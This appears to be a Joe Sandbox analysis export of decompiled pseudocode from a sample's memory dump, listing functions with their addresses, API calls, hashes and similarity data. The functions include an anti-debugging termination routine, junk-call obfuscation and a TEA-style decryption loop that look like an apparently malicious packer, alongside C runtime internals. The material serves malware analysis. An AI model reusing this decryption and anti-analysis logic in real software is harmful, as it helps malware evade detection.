                      				_v808 = _t13;
                      				 *0x4439d0 = IsDebuggerPresent();
                      				_push(1);
                      				E0040FE79(_t14);
                      				SetUnhandledExceptionFilter(0);
                      				_t17 = UnhandledExceptionFilter(0x403668);
                      				if( *0x4439d0 == 0) {
                      					_push(1);
                      					E0040FE79(_t17);
                      				}
                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                      			}



















                      0x0040dac5
                      0x0040dac5
                      0x0040dac5
                      0x0040dac5
                      0x0040dac5
                      0x0040dac5
                      0x0040dac5
                      0x0040dacb
                      0x0040dacd
                      0x0040dacd
                      0x004116b8
                      0x004116bd
                      0x004116c3
                      0x004116c9
                      0x004116cf
                      0x004116d5
                      0x004116db
                      0x004116e2
                      0x004116e9
                      0x004116f0
                      0x004116f7
                      0x004116fe
                      0x00411705
                      0x00411706
                      0x0041170f
                      0x00411717
                      0x0041171f
                      0x0041172a
                      0x00411734
                      0x00411739
                      0x0041173e
                      0x00411748
                      0x00411752
                      0x00411757
                      0x0041175d
                      0x00411762
                      0x0041176e
                      0x00411773
                      0x00411775
                      0x0041177d
                      0x00411788
                      0x00411795
                      0x00411797
                      0x00411799
                      0x0041179e
                      0x004117b2

                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 00411768
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041177D
                      • UnhandledExceptionFilter.KERNEL32(00403668), ref: 00411788
                      • GetCurrentProcess.KERNEL32(C0000409), ref: 004117A4
                      • TerminateProcess.KERNEL32(00000000), ref: 004117AB
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                      • String ID:
                      • API String ID: 2579439406-0
                      • Opcode ID: e56adc4fb028b09e5fd685bfddd59d154ad31a554af4545f529720d33ac3618a
                      • Instruction ID: 44c83ca924ea761246156bbdbede59a01a7d9a973c5a695b3c30ea3236756c36
                      • Opcode Fuzzy Hash: e56adc4fb028b09e5fd685bfddd59d154ad31a554af4545f529720d33ac3618a
                      • Instruction Fuzzy Hash: C621F4B8951300AFD300DF69FD496447BA4BB0AB16F10443AE489A3B71E7B09A84CF0D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040C824() {
                      
                      				SetUnhandledExceptionFilter(E0040C7E2);
                      				return 0;
                      			}



                      0x0040c829
                      0x0040c831

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000C7E2), ref: 0040C829
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
                      • Instruction ID: e2a8f789a288a585d98f9b92902466bf4f7c4288f4264d283a5847212c576c19
                      • Opcode Fuzzy Hash: 65c1160e3f4fa38e3d913f6471cde14fbcffea4a8c5c8d78ac901dff034a275d
                      • Instruction Fuzzy Hash: 5F900271291142C6C60417715E4A64665985A5C70276145796541E5CA5EB7450406919
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.305076763.0000000000490000.00000040.00001000.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_490000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: e7647ade4e4de794abb8fd462c162b5e88dab82f54c805f895148272b5c2650b
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: EB1182723401009FDB54DF65EC91FA677EAEB89320B298166ED08CB312D67AEC42C760
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00404D37() {
                      				void* _v6;
                      				struct _COORD _v8;
                      				unsigned int _v12;
                      				long _v16;
                      				long _v20;
                      				int _v24;
                      				short _v2072;
                      				char _v4120;
                      				unsigned int _t15;
                      				void* _t16;
                      				intOrPtr _t32;
                      				intOrPtr _t34;
                      
                      				E0040E260(0x1014);
                      				_t34 =  *0x444e10;
                      				_t15 =  *0x445044 >> 3;
                      				if(_t15 > 0) {
                      					_t32 = _t34;
                      					_v12 = _t15;
                      					do {
                      						if( *0x445044 == 0x959) {
                      							GetProcessWorkingSetSize(0, 0, 0);
                      							_v8 = 0;
                      							asm("stosw");
                      							FillConsoleOutputCharacterA(0, 0, 0, _v8,  &_v24);
                      							WriteConsoleW(0, 0, 0,  &_v16, 0);
                      							LCMapStringW(0, 0, 0, 0,  &_v2072, 0);
                      							LoadLibraryW(L"rijaxosetosezurinurikudeg");
                      							LoadLibraryA(0);
                      							WriteConsoleA(0, 0, 0,  &_v20, 0);
                      							__imp__GetConsoleAliasesW( &_v4120, 0, 0);
                      							GetFileInformationByHandle(0, 0);
                      						}
                      						_t16 = E00404BB7(0, _t32);
                      						_t32 = _t32 + 8;
                      						_t10 =  &_v12;
                      						 *_t10 = _v12 - 1;
                      					} while ( *_t10 != 0);
                      					return _t16;
                      				}
                      				return _t15;
                      			}















                      0x00404d3f
                      0x00404d49
                      0x00404d50
                      0x00404d57
                      0x00404d5f
                      0x00404d61
                      0x00404d64
                      0x00404d6e
                      0x00404d73
                      0x00404d7b
                      0x00404d82
                      0x00404d8e
                      0x00404d9c
                      0x00404dae
                      0x00404db9
                      0x00404dc0
                      0x00404dce
                      0x00404ddd
                      0x00404de5
                      0x00404de5
                      0x00404dec
                      0x00404df1
                      0x00404df4
                      0x00404df4
                      0x00404df4
                      0x00000000
                      0x00404dfe
                      0x00404e01

                      APIs
                      • GetProcessWorkingSetSize.KERNEL32(00000000,00000000,00000000), ref: 00404D73
                      • FillConsoleOutputCharacterA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00404D8E
                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404D9C
                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00404DAE
                      • LoadLibraryW.KERNEL32(rijaxosetosezurinurikudeg), ref: 00404DB9
                      • LoadLibraryA.KERNEL32(00000000), ref: 00404DC0
                      • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404DCE
                      • GetConsoleAliasesW.KERNEL32(?,00000000,00000000), ref: 00404DDD
                      • GetFileInformationByHandle.KERNEL32(00000000,00000000), ref: 00404DE5
                      Strings
                      • rijaxosetosezurinurikudeg, xrefs: 00404DB4
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: Console$LibraryLoadWrite$AliasesCharacterFileFillHandleInformationOutputProcessSizeStringWorking
                      • String ID: rijaxosetosezurinurikudeg
                      • API String ID: 2068669440-2185336016
                      • Opcode ID: ca8ff0ce7aef4f46b8501e72310b72cdda782ed2ec4e68aad69089b4dad34f6d
                      • Instruction ID: 09dc9c0b1a0277102b7eb4515fbd56d9a6e33ae88d7fd16bce9b287a08417337
                      • Opcode Fuzzy Hash: ca8ff0ce7aef4f46b8501e72310b72cdda782ed2ec4e68aad69089b4dad34f6d
                      • Instruction Fuzzy Hash: 71112C76802528BBD7219BA1EE48CEF7F7CEF8A351B000066F649E2160C6385641CBF9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E0040B5C9(signed int __edx, char _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t59;
                      				intOrPtr* _t61;
                      				signed int _t63;
                      				void* _t68;
                      				signed int _t69;
                      				signed int _t72;
                      				signed int _t74;
                      				signed int _t75;
                      				signed int _t77;
                      				signed int _t78;
                      				signed int _t81;
                      				signed int _t82;
                      				signed int _t84;
                      				signed int _t88;
                      				signed int _t97;
                      				signed int _t98;
                      				signed int _t99;
                      				intOrPtr* _t100;
                      				void* _t101;
                      
                      				_t90 = __edx;
                      				if(_a8 == 0 || _a12 == 0) {
                      					L4:
                      					return 0;
                      				} else {
                      					_t100 = _a16;
                      					if(_t100 != 0) {
                      						_t4 =  &_a4; // 0x405f77
                      						_t82 =  *_t4;
                      						__eflags = _t82;
                      						if(_t82 == 0) {
                      							goto L3;
                      						}
                      						_t63 = _t59 | 0xffffffff;
                      						_t90 = _t63 % _a8;
                      						__eflags = _a12 - _t63 / _a8;
                      						if(_a12 > _t63 / _a8) {
                      							goto L3;
                      						}
                      						_t97 = _a8 * _a12;
                      						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                      						_v8 = _t82;
                      						_v16 = _t97;
                      						_t81 = _t97;
                      						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                      							_v12 = 0x1000;
                      						} else {
                      							_v12 =  *(_t100 + 0x18);
                      						}
                      						__eflags = _t97;
                      						if(_t97 == 0) {
                      							L32:
                      							return _a12;
                      						} else {
                      							do {
                      								_t84 =  *(_t100 + 0xc) & 0x00000108;
                      								__eflags = _t84;
                      								if(_t84 == 0) {
                      									L18:
                      									__eflags = _t81 - _v12;
                      									if(_t81 < _v12) {
                      										_t68 = E0040B465(_t90, _t97,  *_v8, _t100);
                      										__eflags = _t68 - 0xffffffff;
                      										if(_t68 == 0xffffffff) {
                      											L34:
                      											_t69 = _t97;
                      											L35:
                      											return (_t69 - _t81) / _a8;
                      										}
                      										_v8 = _v8 + 1;
                      										_t72 =  *(_t100 + 0x18);
                      										_t81 = _t81 - 1;
                      										_v12 = _t72;
                      										__eflags = _t72;
                      										if(_t72 <= 0) {
                      											_v12 = 1;
                      										}
                      										goto L31;
                      									}
                      									__eflags = _t84;
                      									if(_t84 == 0) {
                      										L21:
                      										__eflags = _v12;
                      										_t98 = _t81;
                      										if(_v12 != 0) {
                      											_t75 = _t81;
                      											_t90 = _t75 % _v12;
                      											_t98 = _t98 - _t75 % _v12;
                      											__eflags = _t98;
                      										}
                      										_push(_t98);
                      										_push(_v8);
                      										_push(E00408D86(_t100));
                      										_t74 = E00408CAA(_t81, _t90, _t98, _t100, __eflags);
                      										_t101 = _t101 + 0xc;
                      										__eflags = _t74 - 0xffffffff;
                      										if(_t74 == 0xffffffff) {
                      											L36:
                      											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                      											_t69 = _v16;
                      											goto L35;
                      										} else {
                      											_t88 = _t98;
                      											__eflags = _t74 - _t98;
                      											if(_t74 <= _t98) {
                      												_t88 = _t74;
                      											}
                      											_v8 = _v8 + _t88;
                      											_t81 = _t81 - _t88;
                      											__eflags = _t74 - _t98;
                      											if(_t74 < _t98) {
                      												goto L36;
                      											} else {
                      												L27:
                      												_t97 = _v16;
                      												goto L31;
                      											}
                      										}
                      									}
                      									_t77 = E00406324(_t100);
                      									__eflags = _t77;
                      									if(_t77 != 0) {
                      										goto L34;
                      									}
                      									goto L21;
                      								}
                      								_t78 =  *(_t100 + 4);
                      								__eflags = _t78;
                      								if(__eflags == 0) {
                      									goto L18;
                      								}
                      								if(__eflags < 0) {
                      									_t48 = _t100 + 0xc;
                      									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                      									__eflags =  *_t48;
                      									goto L34;
                      								}
                      								_t99 = _t81;
                      								__eflags = _t81 - _t78;
                      								if(_t81 >= _t78) {
                      									_t99 = _t78;
                      								}
                      								E0040B100(_t81, _t99, _t100,  *_t100, _v8, _t99);
                      								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                      								 *_t100 =  *_t100 + _t99;
                      								_t101 = _t101 + 0xc;
                      								_t81 = _t81 - _t99;
                      								_v8 = _v8 + _t99;
                      								goto L27;
                      								L31:
                      								__eflags = _t81;
                      							} while (_t81 != 0);
                      							goto L32;
                      						}
                      					}
                      					L3:
                      					_t61 = E0040747B();
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					 *_t61 = 0x16;
                      					E00409867(_t90, 0, _t100);
                      					goto L4;
                      				}
                      			}





























                      0x0040b5c9
                      0x0040b5d9
                      0x0040b5ff
                      0x00000000
                      0x0040b5e0
                      0x0040b5e0
                      0x0040b5e5
                      0x0040b606
                      0x0040b606
                      0x0040b609
                      0x0040b60b
                      0x00000000
                      0x00000000
                      0x0040b60d
                      0x0040b612
                      0x0040b615
                      0x0040b618
                      0x00000000
                      0x00000000
                      0x0040b61d
                      0x0040b621
                      0x0040b628
                      0x0040b62b
                      0x0040b62e
                      0x0040b630
                      0x0040b63a
                      0x0040b632
                      0x0040b635
                      0x0040b635
                      0x0040b641
                      0x0040b643
                      0x0040b708
                      0x00000000
                      0x0040b649
                      0x0040b649
                      0x0040b64c
                      0x0040b64c
                      0x0040b652
                      0x0040b683
                      0x0040b683
                      0x0040b686
                      0x0040b6df
                      0x0040b6e6
                      0x0040b6e9
                      0x0040b714
                      0x0040b714
                      0x0040b716
                      0x00000000
                      0x0040b71a
                      0x0040b6eb
                      0x0040b6ee
                      0x0040b6f1
                      0x0040b6f2
                      0x0040b6f5
                      0x0040b6f7
                      0x0040b6f9
                      0x0040b6f9
                      0x00000000
                      0x0040b6f7
                      0x0040b688
                      0x0040b68a
                      0x0040b697
                      0x0040b697
                      0x0040b69b
                      0x0040b69d
                      0x0040b6a1
                      0x0040b6a3
                      0x0040b6a6
                      0x0040b6a6
                      0x0040b6a6
                      0x0040b6a8
                      0x0040b6a9
                      0x0040b6b3
                      0x0040b6b4
                      0x0040b6b9
                      0x0040b6bc
                      0x0040b6bf
                      0x0040b722
                      0x0040b722
                      0x0040b726
                      0x00000000
                      0x0040b6c1
                      0x0040b6c1
                      0x0040b6c3
                      0x0040b6c5
                      0x0040b6c7
                      0x0040b6c7
                      0x0040b6c9
                      0x0040b6cc
                      0x0040b6ce
                      0x0040b6d0
                      0x00000000
                      0x0040b6d2
                      0x0040b6d2
                      0x0040b6d2
                      0x00000000
                      0x0040b6d2
                      0x0040b6d0
                      0x0040b6bf
                      0x0040b68d
                      0x0040b693
                      0x0040b695
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040b695
                      0x0040b654
                      0x0040b657
                      0x0040b659
                      0x00000000
                      0x00000000
                      0x0040b65b
                      0x0040b710
                      0x0040b710
                      0x0040b710
                      0x00000000
                      0x0040b710
                      0x0040b661
                      0x0040b663
                      0x0040b665
                      0x0040b667
                      0x0040b667
                      0x0040b66f
                      0x0040b674
                      0x0040b677
                      0x0040b679
                      0x0040b67c
                      0x0040b67e
                      0x00000000
                      0x0040b700
                      0x0040b700
                      0x0040b700
                      0x00000000
                      0x0040b649
                      0x0040b643
                      0x0040b5e7
                      0x0040b5e7
                      0x0040b5ec
                      0x0040b5ed
                      0x0040b5ee
                      0x0040b5ef
                      0x0040b5f0
                      0x0040b5f1
                      0x0040b5f7
                      0x00000000
                      0x0040b5fc

                      APIs
                      • __flush.LIBCMT ref: 0040B68D
                      • __fileno.LIBCMT ref: 0040B6AD
                      • __locking.LIBCMT ref: 0040B6B4
                      • __flsbuf.LIBCMT ref: 0040B6DF
                        • Part of subcall function 0040747B: __getptd_noexit.LIBCMT ref: 0040747B
                        • Part of subcall function 00409867: __decode_pointer.LIBCMT ref: 00409872
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                      • String ID: w_@$w_@
                      • API String ID: 3240763771-614044935
                      • Opcode ID: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
                      • Instruction ID: 5f5606b89cac3dbd6312031acd89d28b1066f652792005636562e4df81556f48
                      • Opcode Fuzzy Hash: 7ef8ad68f24ec646da2e8474396d1447a719726a16c880bf03455043e50d3b06
                      • Instruction Fuzzy Hash: 57419331A006049BDB249F6AC84455FB7B6EF80324F24893BE455B72C0D779DD518B9D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E00404BB7(void* __eflags, unsigned int* _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				char _v16;
                      				unsigned int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				char _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr* _t68;
                      				intOrPtr _t69;
                      				intOrPtr _t70;
                      				intOrPtr _t73;
                      				intOrPtr _t74;
                      				intOrPtr _t78;
                      				unsigned int* _t99;
                      				signed int _t104;
                      				unsigned int _t111;
                      
                      				_t68 = _a4;
                      				_t111 =  *(_t68 + 4);
                      				_t69 =  *0x419478; // 0xd8357316
                      				_v48 = _t69;
                      				_t70 =  *0x41947c; // 0x67133a8e
                      				_v52 = _t70;
                      				_v20 =  *_t68;
                      				_v16 = 0;
                      				_v56 = 0x9e3779b9;
                      				E00404BAD( &_v16);
                      				_v16 = _v16 + 0x23f;
                      				if( *0x445044 == 0x14) {
                      					BackupEventLogW(0, 0);
                      				}
                      				_t73 =  *0x419480; // 0xcf6e2a9d
                      				_v40 = _t73;
                      				_t74 =  *0x419484; // 0xed9c5b15
                      				_v44 = _t74;
                      				_v36 = 0x20;
                      				_t104 = 2;
                      				do {
                      					_v28 = _t104;
                      					_v28 = _v28 + 3;
                      					_v8 = (_v20 << 4) + _v40;
                      					_t78 =  *0x445044;
                      					if(_t78 == 0xfa9) {
                      						 *0x444ea4 = 0xedeb2e40;
                      					}
                      					if(_t78 == 0x3eb) {
                      						 *0x444e0c = 0;
                      					}
                      					_v24 = _v20;
                      					_v24 = _v24 + _v16;
                      					_v12 = _v20 >> 5;
                      					 *0x444ea0 = 0xf4ea3dee;
                      					E00404BB4( &_v12, _v44);
                      					_v8 = _v8 ^ _v24;
                      					if( *0x445044 == 0x9e6) {
                      						GetLastError();
                      					}
                      					_v12 = _v12 ^ _v8;
                      					if( *0x445044 == 0x213) {
                      						WaitNamedPipeW(0, 0);
                      						__imp__AssignProcessToJobObject(0, 0);
                      						GetFullPathNameW(0, 0, 0, 0);
                      					}
                      					_t111 = _t111 - _v12;
                      					_v32 = _t104;
                      					_v32 = _v32 - 0x5396dd36;
                      					_v32 = _v32 + 0x5396dd38;
                      					_v8 = (_t111 << _v32) + _v48;
                      					_v24 = _v16 + _t111;
                      					_v12 = _t111 >> _v28;
                      					_v12 = _v12 + _v52;
                      					_v8 = _v8 ^ _v24;
                      					_v8 = _v8 ^ _v12;
                      					 *0x443dac = 0;
                      					_v20 = _v20 - _v8;
                      					_v16 = _v16 - _v56;
                      					_t63 =  &_v36;
                      					 *_t63 = _v36 - 1;
                      				} while ( *_t63 != 0);
                      				_t99 = _a4;
                      				_t99[1] = _t111;
                      				 *_t99 = _v20;
                      				return _t99;
                      			}

























                      0x00404bbd
                      0x00404bc4
                      0x00404bc7
                      0x00404bcc
                      0x00404bcf
                      0x00404bd7
                      0x00404bdd
                      0x00404be0
                      0x00404be3
                      0x00404bea
                      0x00404bef
                      0x00404bfd
                      0x00404c01
                      0x00404c01
                      0x00404c07
                      0x00404c0c
                      0x00404c0f
                      0x00404c16
                      0x00404c19
                      0x00404c20
                      0x00404c21
                      0x00404c21
                      0x00404c24
                      0x00404c31
                      0x00404c34
                      0x00404c3e
                      0x00404c40
                      0x00404c40
                      0x00404c4f
                      0x00404c51
                      0x00404c51
                      0x00404c5a
                      0x00404c60
                      0x00404c69
                      0x00404c72
                      0x00404c7c
                      0x00404c84
                      0x00404c91
                      0x00404c93
                      0x00404c93
                      0x00404c9c
                      0x00404ca9
                      0x00404cad
                      0x00404cb5
                      0x00404cbf
                      0x00404cbf
                      0x00404cc5
                      0x00404cc8
                      0x00404ccb
                      0x00404cd2
                      0x00404ce6
                      0x00404cee
                      0x00404cf5
                      0x00404cfb
                      0x00404d01
                      0x00404d07
                      0x00404d0a
                      0x00404d13
                      0x00404d19
                      0x00404d1c
                      0x00404d1c
                      0x00404d1c
                      0x00404d25
                      0x00404d2c
                      0x00404d30
                      0x00404d34

                      APIs
                      • BackupEventLogW.ADVAPI32(00000000,00000000), ref: 00404C01
                      • GetLastError.KERNEL32 ref: 00404C93
                      • WaitNamedPipeW.KERNEL32(00000000,00000000), ref: 00404CAD
                      • AssignProcessToJobObject.KERNEL32 ref: 00404CB5
                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404CBF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: AssignBackupErrorEventFullLastNameNamedObjectPathPipeProcessWait
                      • String ID:
                      • API String ID: 2469782577-3916222277
                      • Opcode ID: 862e9306a8c95a0554d2d552335e2b8afc974939a87aa26a2d40c85e991d02c4
                      • Instruction ID: 7c75a1f79addb4e0a2996dba82e54bd14a1d6821e51a0490c20752b2ab3f168e
                      • Opcode Fuzzy Hash: 862e9306a8c95a0554d2d552335e2b8afc974939a87aa26a2d40c85e991d02c4
                      • Instruction Fuzzy Hash: 6D51F1B5D01208EFDB00DFA9D984AAEBBF4FB99310F10806AE514F7251D334AA41CF55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00416028(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _t48;
                      				void* _t53;
                      				intOrPtr _t57;
                      				void* _t58;
                      				void* _t61;
                      
                      				_t61 = __eflags;
                      				_push(0x2c);
                      				_push(0x4172f0);
                      				E00408168(__ebx, __edi, __esi);
                      				_t48 = __ecx;
                      				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                      				_t57 =  *((intOrPtr*)(_t58 + 8));
                      				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                      				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                      				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                      				 *((intOrPtr*)(_t58 - 0x28)) = E00415BC3(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                      				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040BD70(__ecx, _t53, _t61) + 0x88));
                      				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c));
                      				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x88)) = _t57;
                      				 *((intOrPtr*)(E0040BD70(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                      				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                      				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                      				 *(_t58 - 4) = 1;
                      				 *((intOrPtr*)(_t58 - 0x1c)) = E00415C68(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                      				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                      				 *(_t58 - 4) = 0xfffffffe;
                      				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                      				E0041614E(_t48, _t53, _t55, _t57, _t61);
                      				return E004081AD( *((intOrPtr*)(_t58 - 0x1c)));
                      			}








                      0x00416028
                      0x00416028
                      0x0041602a
                      0x0041602f
                      0x00416034
                      0x00416036
                      0x00416039
                      0x0041603c
                      0x0041603f
                      0x00416046
                      0x00416057
                      0x00416065
                      0x00416073
                      0x0041607b
                      0x00416089
                      0x0041608f
                      0x00416096
                      0x00416099
                      0x004160af
                      0x004160b2
                      0x00416127
                      0x0041612e
                      0x00416135
                      0x00416142

                      APIs
                      • __CreateFrameInfo.LIBCMT ref: 00416050
                        • Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BD1
                        • Part of subcall function 00415BC3: __getptd.LIBCMT ref: 00415BDF
                      • __getptd.LIBCMT ref: 0041605A
                        • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                        • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                      • __getptd.LIBCMT ref: 00416068
                      • __getptd.LIBCMT ref: 00416076
                      • __getptd.LIBCMT ref: 00416081
                      • _CallCatchBlock2.LIBCMT ref: 004160A7
                        • Part of subcall function 00415C68: __CallSettingFrame@12.LIBCMT ref: 00415CB4
                        • Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041615D
                        • Part of subcall function 0041614E: __getptd.LIBCMT ref: 0041616B
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
